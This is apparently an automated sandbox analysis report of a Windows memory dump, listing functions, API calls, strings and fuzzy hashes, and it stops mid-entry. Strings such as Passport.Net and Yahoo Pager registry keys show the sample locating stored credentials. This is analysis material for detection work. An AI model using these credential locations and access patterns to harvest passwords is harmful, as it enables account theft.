
Strings

Passport.Net\*, xrefs: 0040F099

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
String ID: Passport.Net\*
API String ID: 2329438634-3671122194
Opcode ID: d448fd3e3bb25834377e5853a8114734348acb0949ae885f122676eae1665e6c
Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
Opcode Fuzzy Hash: d448fd3e3bb25834377e5853a8114734348acb0949ae885f122676eae1665e6c
Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004032A9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D

memset.MSVCRT ref: 004032FD
GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
strchr.MSVCRT ref: 0040334C

Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F

strlen.MSVCRT ref: 0040338E

Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB

Strings

Personalities, xrefs: 00403312

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
String ID: Personalities
API String ID: 2103853322-4287407858
Opcode ID: c990886822b6edcfe5cd482dd8fe88df10ef8dfff52afeedecb3c7aa37baf4c1
Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
Opcode Fuzzy Hash: c990886822b6edcfe5cd482dd8fe88df10ef8dfff52afeedecb3c7aa37baf4c1
Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D

Uniqueness

Uniqueness Score: -1.00%

Function 004101D8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
memcpy.MSVCRT ref: 00410238

Strings

00000000-0000-0000-0000-000000000000, xrefs: 004101F7
5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FromStringUuid$memcpy
String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
API String ID: 2859077140-3316789007
Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5

Uniqueness

Uniqueness Score: -1.00%

Function 00443A35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443A57
RegCloseKey.ADVAPI32(?), ref: 00443AC3

Strings

EOptions string, xrefs: 00443A96
Software\Yahoo\Pager, xrefs: 00443A60
Yahoo! User ID, xrefs: 00443A7B

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: Closememset
String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
API String ID: 2732369425-1703613266
Opcode ID: d576b467f78d8ea685085db5ddef6743c9b78cdcf62d59097216c40f4ce2bc95
Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
Opcode Fuzzy Hash: d576b467f78d8ea685085db5ddef6743c9b78cdcf62d59097216c40f4ce2bc95
Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00443A35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443A57

Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424

Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,004107E3,?,?,?,?,004107E3,00000000,?,?), ref: 0041046D

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3

Strings

Software\Yahoo\Pager, xrefs: 00443A60
Yahoo! User ID, xrefs: 00443A7B
EOptions string, xrefs: 00443A96

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuememset
String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
API String ID: 1830152886-1703613266
Opcode ID: d1bbde70159df11e1f5551aa24047e9b9ea680b42b48fe813cb4a40a4d976f5d
Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
Opcode Fuzzy Hash: d1bbde70159df11e1f5551aa24047e9b9ea680b42b48fe813cb4a40a4d976f5d
Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406B15, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?), ref: 00406B25
sprintf.MSVCRT ref: 00406B4D
MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406B66

Strings

Error, xrefs: 00406B57
Error %d: %s, xrefs: 00406B47

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99

Uniqueness

Uniqueness Score: -1.00%

Function 00410909, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,770B48C0,00405E9E,00000000), ref: 00410912
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
FreeLibrary.KERNEL32(00000000), ref: 00410938

Strings

SHAutoComplete, xrefs: 0041091A
shlwapi.dll, xrefs: 0041090B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A

Uniqueness

Uniqueness Score: -1.00%

Function 0043D438, Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 478COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043D4CD
memset.MSVCRT ref: 0043D506
memcpy.MSVCRT ref: 0043D781

Strings

, xrefs: 0043D7EB
no query solution, xrefs: 0043D81D

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset$memcpy
String ID: $no query solution
API String ID: 368790112-326442043
Opcode ID: 4d10da7c05fd9abb2eba5f94208ca6bf1805f6046b0e0239d8829d4cecbde2c0
Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
Opcode Fuzzy Hash: 4d10da7c05fd9abb2eba5f94208ca6bf1805f6046b0e0239d8829d4cecbde2c0
Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043000F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0043011B
memcpy.MSVCRT ref: 0043018C

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
foreign key on %s should reference only one column of table %T, xrefs: 0043005F
unknown column "%s" in foreign key definition, xrefs: 0043027A

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: d1c7f0332022069a1e592c4d04a9184cfcbb4504495b693f4a7ca8ddfce05e8e
Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
Opcode Fuzzy Hash: d1c7f0332022069a1e592c4d04a9184cfcbb4504495b693f4a7ca8ddfce05e8e
Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB52, Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043CB87
memset.MSVCRT ref: 0043CDB9

Strings

H, xrefs: 0043CC3C

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: H
API String ID: 2221118986-2852464175
Opcode ID: ba3b6b3fb31e689ae5d8b2c88fdb3ed960a53e31928b3596580907275997637f
Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
Opcode Fuzzy Hash: ba3b6b3fb31e689ae5d8b2c88fdb3ed960a53e31928b3596580907275997637f
Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3D8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041D435
memcmp.MSVCRT ref: 0041D462
memcmp.MSVCRT ref: 0041D4CE

Strings

SQLite format 3, xrefs: 0041D456
@ , xrefs: 0041D4C8

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 4cc76588abd98a6992c7713a5d1e6149f17c3bf8f3c624dfe453da30bb1106c3
Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
Opcode Fuzzy Hash: 4cc76588abd98a6992c7713a5d1e6149f17c3bf8f3c624dfe453da30bb1106c3
Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00424D44, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 173COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00424E4D
memcpy.MSVCRT ref: 00424E68

Strings

string or blob too big, xrefs: 00425229
statement aborts at %d: [%s] %s, xrefs: 0042525A
out of memory, xrefs: 00425E19

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 3510742995-3170954634
Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00413E34, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00413E77
memcpy.MSVCRT ref: 00413E92
memset.MSVCRT ref: 00413EB0
memset.MSVCRT ref: 00413F4A

Strings

winRead, xrefs: 00413F12

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset
String ID: winRead
API String ID: 1297977491-2759563040
Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8C2, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

memset.MSVCRT ref: 0040A8F8

Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD

Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D

sprintf.MSVCRT ref: 0040A93D

Strings

</item>, xrefs: 0040A957
<item>, xrefs: 0040A8CC
<%s>%s</%s>, xrefs: 0040A935

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 3337535707-2769808009
Opcode ID: 31757f8979cddf39406a0cbb2acc4d26fcc953cd1ca43e99caf56cb426078b12
Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
Opcode Fuzzy Hash: 31757f8979cddf39406a0cbb2acc4d26fcc953cd1ca43e99caf56cb426078b12
Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040717E, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040719D
sprintf.MSVCRT ref: 004071BE
_mbscat.MSVCRT ref: 004071D0
_mbscat.MSVCRT ref: 004071ED
_mbscat.MSVCRT ref: 004071FC

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$memsetsprintf
String ID:
API String ID: 125969286-0
Opcode ID: a00bc7a69bfa5b24137ebda2387133b60ae603cd0d1480a18cca94b34f68fdeb
Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
Opcode Fuzzy Hash: a00bc7a69bfa5b24137ebda2387133b60ae603cd0d1480a18cca94b34f68fdeb
Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A

Uniqueness

Uniqueness Score: -1.00%

Function 00443683, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 0044369D
??2@YAPAXI@Z.MSVCRT ref: 004436AF
SetFilePointer.KERNEL32(?,00000002,00000000,00000000), ref: 004436BE

Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 0044357B
Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B

??3@YAXPAX@Z.MSVCRT ref: 004436E9
CloseHandle.KERNEL32(?), ref: 004436F3

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: ??2@??3@File$ByteCharCloseHandleMultiPointerSizeWidememcpystrlenwcslen
String ID:
API String ID: 3899781028-0
Opcode ID: 40316376f672c928e87f6029e4931b896b8e7094f56b0c9e9f7745b1ce70d0e3
Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
Opcode Fuzzy Hash: 40316376f672c928e87f6029e4931b896b8e7094f56b0c9e9f7745b1ce70d0e3
Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28

Uniqueness

Uniqueness Score: -1.00%

Function 00408E21, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00408E33
GetWindowRect.USER32(?,?), ref: 00408E40
GetClientRect.USER32(00000000,?), ref: 00408E4B
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6EF, Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C

Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
Part of subcall function 00406A00: SetCursor.USER32(00000000,?,0040CD7F), ref: 00406A0E

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F

Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7

SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
String ID:
API String ID: 2374668499-0
Opcode ID: e5fdebf6aea7ad79a1181b46484e7d135d6e0b8dd68e8070af22c6d2a4140318
Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
Opcode Fuzzy Hash: e5fdebf6aea7ad79a1181b46484e7d135d6e0b8dd68e8070af22c6d2a4140318
Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA94, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AAB7
memset.MSVCRT ref: 0040AACD

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D

sprintf.MSVCRT ref: 0040AB04

Strings

<%s>, xrefs: 0040AAFE
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3699762281-1998499579
Opcode ID: f1b9a36ea3eb66300483205a941b9b9ef037eb970108d302c91ca7b90677dca7
Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
Opcode Fuzzy Hash: f1b9a36ea3eb66300483205a941b9b9ef037eb970108d302c91ca7b90677dca7
Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040979F, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 004097AB
??3@YAXPAX@Z.MSVCRT ref: 004097B9
??3@YAXPAX@Z.MSVCRT ref: 004097CA
??3@YAXPAX@Z.MSVCRT ref: 004097E1
??3@YAXPAX@Z.MSVCRT ref: 004097EA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
Opcode Fuzzy Hash: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618

Uniqueness

Uniqueness Score: -1.00%

Function 00409805, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA

??3@YAXPAX@Z.MSVCRT ref: 00409820
??3@YAXPAX@Z.MSVCRT ref: 00409833
??3@YAXPAX@Z.MSVCRT ref: 00409846
??3@YAXPAX@Z.MSVCRT ref: 00409859
??3@YAXPAX@Z.MSVCRT ref: 0040986D

Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: e56b6e82d1360767911dfe4b818cb14d758b36c0f5984e33af1d2cfc91de887a
Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
Opcode Fuzzy Hash: e56b6e82d1360767911dfe4b818cb14d758b36c0f5984e33af1d2cfc91de887a
Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE

Uniqueness

Uniqueness Score: -1.00%

Function 004100EC, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA

SetBkMode.GDI32(?,00000001), ref: 00410113
GetSysColor.USER32(00000005), ref: 0041011B
SetBkColor.GDI32(?,00000000), ref: 00410125
SetTextColor.GDI32(?,00C00000), ref: 00410133
GetSysColorBrush.USER32(00000005), ref: 0041013B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Color$BrushClassModeNameText_strcmpimemset
String ID:
API String ID: 2775283111-0
Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
